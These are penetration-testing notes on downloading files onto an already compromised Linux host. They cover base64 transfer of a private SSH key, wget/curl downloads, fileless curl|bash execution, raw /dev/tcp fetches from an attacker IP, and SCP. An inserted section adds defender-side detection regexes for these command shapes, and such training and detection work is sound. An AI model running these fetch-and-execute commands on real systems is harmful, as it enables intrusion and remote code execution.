# Linux File Transfer Download

Linux hosts usually give you one of these download paths.

In practice, `curl`, then `wget`, then Python is a common order to try.

{% hint style="info" %}
**Attacker** means your box, Pwnbox, or redirector.

**Compromised host** means the Linux machine you already accessed.
{% endhint %}

### Download methods

#### 1. Base64 encode and decode

Use this when no direct network transfer works.

Run the first two commands on the **attacker**.

Run the last two commands on the **compromised host**.

```bash
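# Record the hash before the transfer (attacker)
md5sum id_rsa

# Encode on the attacker; -w 0 disables line wrapping so the output is one line
cat id_rsa | base64 -w 0; echo

# Decode on the compromised host
echo -n '<base64string>' | base64 -d > id_rsa

# Verify the hash matches the one recorded on the attacker
md5sum id_rsa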
```

`-n` in `echo` means do not add a newline.

That keeps the Base64 string clean for decoding.

#### 2. `wget` and `curl`

Use this when outbound HTTP or HTTPS works.

**Compromised host — run one of these commands**

```bash
# wget — capital -O for output filename
wget https://<url>/file.sh -O /tmp/file.sh

# curl — lowercase -o for output filename
curl -o /tmp/file.sh https://<url>/file.sh
```

> Only difference worth remembering: `wget` uses `-O`. `curl` uses `-o`.

#### 3. Fileless downloads

Use this when you want to execute content without saving it first.

**Compromised host — run one of these commands**

```bash
# curl — pipe directly into bash
curl https://<url>/script.sh | bash

# wget — pipe into python3
wget -qO- https://<url>/script.py | python3
```

`-qO-` in `wget` means quiet mode and print to stdout.

Then the output pipes straight into the interpreter.

#### 4. Bash `/dev/tcp`

Use this when `wget`, `curl`, and Python are all missing.

**Attacker — start a web server in the folder containing your file**

```bash
python3 -m http.server 80
```

**Compromised host — fetch the file over raw TCP**

```bash
# Step 1 — open TCP connection to web server, assign to file descriptor 3
exec 3<>/dev/tcp/10.10.10.32/80

# Step 2 — send HTTP GET request through that connection
echo -e "GET /file.sh HTTP/1.1\n\n" >&3

# Step 3 — read and print the response
cat <&3
```

Think of file descriptor `3` as a pipe to the remote server.

You write the HTTP request into it, then read the response back out.
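
Seen from the defending side, methods 1, 3 and 4 leave recognisable command-line shapes. The script below is an added example, not part of the original notes: it matches those shapes in a log of full shell command lines. The rule names, the log layout (`time host user command`) and the sample lines are assumptions constructed for the demo.

```bash
#!/bin/sh
# Added example (defender side): flag the command shapes from methods 1, 3
# and 4 in command-line telemetry. Rule names, log layout and sample lines
# are constructed for illustration.

# classify CMDLINE: print the comma-separated rule names that match, or "none".
classify() {
    hits=""
    # Each rule is "name=extended-regex"; the names are hypothetical labels.
    for rule in \
        'pipe-to-interpreter=(curl|wget)[[:space:]][^|;]*[|][[:space:]]*(sudo[[:space:]]+)?(bash|sh|dash|zsh|python[0-9.]*|perl|ruby)([[:space:]]|$)' \
        'dev-tcp-socket=/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+' \
        'base64-decode-to-file=base64[[:space:]]+(-d|--decode)[^|;]*>[[:space:]]*[^[:space:]]+'
    do
        name=${rule%%=*}      # text before the first "="
        regex=${rule#*=}      # text after the first "="
        if printf '%s\n' "$1" | grep -Eq -e "$regex"; then
            hits="${hits:+$hits,}$name"
        fi
    done
    printf '%s\n' "${hits:-none}"
}

# scan: read log lines on stdin, print "rules<TAB>line" for each flagged line.
scan() {
    while IFS= read -r line; do
        label=$(classify "$line")
        [ "$label" = none ] || printf '%s\t%s\n' "$label" "$line"
    done
}

# Constructed sample log: a plain download and a curl-to-jq pipe stay unflagged.
sample_log() {
    cat <<'EOF'
2024-05-01T10:00:01Z web01 www-data curl -o /tmp/file.sh https://example.invalid/file.sh
2024-05-01T10:00:07Z web01 www-data curl https://example.invalid/script.sh | bash
2024-05-01T10:00:12Z web01 www-data wget -qO- https://example.invalid/script.py | python3
2024-05-01T10:00:20Z web01 www-data exec 3<>/dev/tcp/192.0.2.10/80
2024-05-01T10:00:31Z web01 www-data echo -n 'QUJD' | base64 -d > id_rsa
2024-05-01T10:00:40Z web01 deploy curl -s https://example.invalid/health | jq .status
EOF
}

sample_log | scan
```

Pipes and redirections are handled by the shell and never appear in `execve` arguments, so these rules need telemetry that records the whole command string, such as shell history or the argument passed to `sh -c`.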

#### 5. SCP

SCP uses SSH on port `22`.

It is encrypted and usually cleaner than HTTP when SSH is available.

**Attacker — start SSH on the host serving the file**

```bash
# Start SSH server on Pwnbox first
sudo systemctl enable ssh
sudo systemctl start ssh
```

**Compromised host — pull the file over SSH**

```bash
# Download FROM remote TO local (run on target)
scp user@192.168.49.128:/root/file.txt .

# The dot at the end means "current directory"
```


